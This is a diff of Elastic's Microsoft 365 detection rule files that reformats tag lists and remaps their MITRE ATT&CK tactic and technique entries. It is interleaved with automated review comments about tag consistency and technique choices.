@@ -67,7 +67,19 @@ references = [ risk_score = 47 rule_id = "0e524fa6-eed3-11ef-82b4-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Domain: Storage", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: SharePoint", "Data Source: OneDrive", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Domain: Storage", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: SharePoint", + "Data Source: OneDrive", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -134,3 +146,11 @@ reference = "https://attack.mitre.org/techniques/T1530/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml index 517692da649..f2e5eb1098f 100644 --- a/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml +++ b/rules/integrations/o365/collection_sharepoint_file_download_via_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] 
@@ -62,7 +62,16 @@ references = [ risk_score = 47 rule_id = "491651da-125b-11f1-af7d-f661ea17fbce" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -77,23 +86,31 @@ event.dataset: "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index 1b66c64fc1b..bcad5515b25 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -50,7 +50,15 @@ references = [ risk_score = 73 rule_id = "fcd2e4be-6ec4-482f-9222-6245367cd738" severity = "high" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -67,31 +75,48 @@ sequence by related.user with maxspan=30m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.005" name = "Device Registration" reference = "https://attack.mitre.org/techniques/T1098/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + 
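Review bot: The tags hunk for the device-registration rule drops `"Tactic: Persistence"` and does not add `"Tactic: Initial Access"`, yet the threat hunk below keeps the TA0003 Persistence entry and adds a new TA0001 Initial Access entry, so `tags` and `rule.threat` no longer agree. Any check that compares `Tactic:` tags against the tactics in `rule.threat` would report both tags as missing for this rule; either add `"Tactic: Persistence",` and `"Tactic: Initial Access",` to `tags`, or remove the TA0003 block if Persistence is no longer intended. The added Initial Access block also omits the blank lines between `framework`, `[[rule.threat.technique]]` and the subtechnique while stacking three blank lines before `[rule.threat.tactic]`; matching the one-blank-line layout of the existing blocks keeps future diffs small.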
diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index 9ee8b45d02c..d9d60e52102 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/10" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -127,18 +127,29 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" +[[rule.threat.technique.subtechnique]] +id = "T1110.004" +name = "Credential Stuffing" +reference = "https://attack.mitre.org/techniques/T1110/004/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml index 0dc0777f315..692780a6416 100644 --- a/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml +++ b/rules/integrations/o365/defense_evasion_entra_id_susp_oauth2_authorization.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] 
@@ -188,18 +188,48 @@ from logs-o365.audit-* [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml index 943ff042f2e..8574d32b915 100644 --- a/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml +++ b/rules/integrations/o365/defense_evasion_exchange_dlp_policy_removed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] author = ["Elastic"] 
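Review bot: The threat hunk for the suspicious OAuth2 authorization rule adds TA0006 Credential Access and TA0001 Initial Access entries, but this file's diff carries no `tags` hunk, so unless the tags line already lists them, `"Tactic: Credential Access"` and `"Tactic: Initial Access"` are absent from `tags` while those tactics now appear in `rule.threat`. The same tags-without-hunk gap applies to the Impact entry added to the "user restricted from sending email" rule and to the Resource Development entries added to the two malware-uploaded rules later in this chunk. Layout in the new blocks is also uneven — no blank line after `+framework = "MITRE ATT&CK"` or before each `[[rule.threat.technique]]`, then three blank lines before `[rule.threat.tactic]`.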
@@ -80,16 +80,11 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index df05815d262..1a63debc029 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/13" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -64,7 +64,7 @@ references = ["https://twitter.com/misconfig/status/1476144066807140355"] risk_score = 47 rule_id = "675239ea-c1bc-4467-a6d3-b9e2cc7f676d" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Tactic: Initial Access", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
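Review bot: The tags hunk for the mailbox-audit-bypass rule adds `"Tactic: Initial Access"`, but the threat hunk that follows on the next line maps only TA0005 Defense Evasion (T1562 with T1562.001 and T1562.008), so the new tag has no matching `rule.threat` entry. If Initial Access is intended, add a `[[rule.threat]]` block with `id = "TA0001"` / `name = "Initial Access"`; otherwise drop the tag, which a tags-vs-threat consistency check would report as an orphan.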
@@ -75,18 +75,23 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml index 1fce09f533f..9b65cad7179 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_policy_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -84,18 +84,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
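Review bot: Adding `id = "T1562.001"` (Disable or Modify Tools) next to T1562.008 in the mailbox-audit-bypass rule runs opposite to the other Exchange hunks in this chunk, which remove T1562.001 from the DLP-policy, malware-filter and Safe Attachments rules. Setting a mailbox audit bypass association is a logging change, which the existing T1562.008 (Disable or Modify Cloud Logs) already captures; unless a protection tool is actually disabled by this action, the .001 subtechnique seems to belong with the policy rules it is being removed from rather than here.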
diff --git a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml index 6fb8a45115b..aeb5c15781c 100644 --- a/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml +++ b/rules/integrations/o365/defense_evasion_exchange_malware_filter_rule_mod.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml index 0ba6cba943d..42f4af5cf54 100644 --- a/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml +++ b/rules/integrations/o365/defense_evasion_exchange_safe_attach_rule_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -83,18 +83,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml index e6ea0aaf6ec..7b81c5b2bd0 100644 --- a/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml +++ b/rules/integrations/o365/defense_evasion_sharepoint_sharing_policy_weakened.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/27" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [rule] author = ["Elastic", "Austin Songer"] @@ -107,13 +107,17 @@ event.dataset: "o365.audit" and event.provider: ("SharePoint" or "OneDrive") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml index 51150629c75..98575d9075a 100644 
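Review bot: Remapping the SharePoint sharing-policy rule from T1484 to `T1562` / `T1562.001` (Disable or Modify Tools) is hard to square with the rest of this chunk: the same patch removes T1562.001 from the rules that do disable protection tooling (DLP policy, malware filter, Safe Attachments) yet adds it to a rule about loosening a tenant sharing policy, which is configuration rather than a security tool. The two Teams rules in the next hunks get the same T1484 → T1562 remap but stop at the parent technique. If T1484 is being retired on purpose, the parent-only T1562 mapping used by the Teams hunks is the safer choice for the sharing-policy rule as well.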
--- a/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml +++ b/rules/integrations/o365/defense_evasion_teams_custom_app_interaction_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -80,13 +80,14 @@ o365.audit.NewValue:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml index 9c9c726a77e..a83611522d5 100644 --- a/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml +++ b/rules/integrations/o365/defense_evasion_teams_external_access_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/11" [rule] author = ["Elastic"] @@ -78,13 +78,14 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1484" -name = "Domain or Tenant Policy Modification" -reference = "https://attack.mitre.org/techniques/T1484/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + 
diff --git a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml index ea4d8372529..1e70dfb7fd2 100644 --- a/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml +++ b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/24" [rule] author = ["Elastic"] @@ -52,7 +52,16 @@ references = ["https://cloud.google.com/blog/topics/threat-intelligence/expansio risk_score = 21 rule_id = "4f2654e4-125b-11f1-af7d-f661ea17fbce" severity = "low" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Collection", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -92,18 +101,35 @@ web where event.dataset == "o365.audit" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1619" +name = "Cloud Storage Object Discovery" +reference = "https://attack.mitre.org/techniques/T1619/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml index d2d87fd2d44..cc943708bc7 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -67,7 +67,7 @@ references = [ risk_score = 47 rule_id = "ff4dd44a-0ac6-44c4-8609-3f81bc820f02" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Collection", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -78,18 +78,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1114" -name = "Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1114.003" -name = "Email Forwarding Rule" -reference = "https://attack.mitre.org/techniques/T1114/003/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml index ef9c4fa2887..ed1b40e8736 100644 --- a/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml +++ b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -68,7 +68,7 @@ references = [ risk_score = 47 rule_id = "272a6484-2663-46db-a532-ef734bf9a796" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Microsoft 365", "Use Case: Configuration Audit", "Tactic: Exfiltration", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
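Review bot: Replacing T1114 / T1114.003 (Email Forwarding Rule) with `id = "T1537"` / `name = "Transfer Data to Cloud Account"` in the transport-rule-creation hunk swaps in a technique that does not describe the activity: T1537 covers copying data into another cloud account the adversary controls, whereas an Exchange transport rule that redirects mail is the case T1114.003 was written for. Moving the tactic to TA0010 Exfiltration is reasonable, but it can be done by adding a second `[[rule.threat]]` block instead of dropping the Collection/T1114.003 entry. The transport-rule-modification hunk on the next line lands on the same T1537 mapping and has the same problem.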
@@ -79,18 +79,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml index 34979e5bdcc..50995758898 100644 --- a/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/24" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] 
@@ -79,7 +79,15 @@ references = [ risk_score = 47 rule_id = "0c3c80de-08c2-11f0-bd11-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", + "Tactic: Credential Access", +] timestamp_override = "event.ingested" type = "new_terms" @@ -94,16 +102,34 @@ event.dataset: "o365.audit" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml index e4b0251791c..f97a3f4fe2b 100644 
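Review bot: In the illicit-consent-grant tags hunk the two new `"Tactic: …"` entries are appended after `"Resources: Investigation Guide"`, while every other reformatted tags block in this chunk (OneDrive, SharePoint, device registration, SSO errors, global administrator) keeps `"Resources: Investigation Guide"` as the last element; moving `"Tactic: Initial Access",` and `"Tactic: Credential Access",` above it keeps the ordering consistent. The first-party OAuth phishing tags hunk on the next line places `"Tactic: Initial Access"` after it in the same way.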
--- a/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -65,7 +65,15 @@ references = [ risk_score = 47 rule_id = "929d0766-204b-11f0-9c1f-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access", +] timestamp_override = "event.ingested" type = "query" 
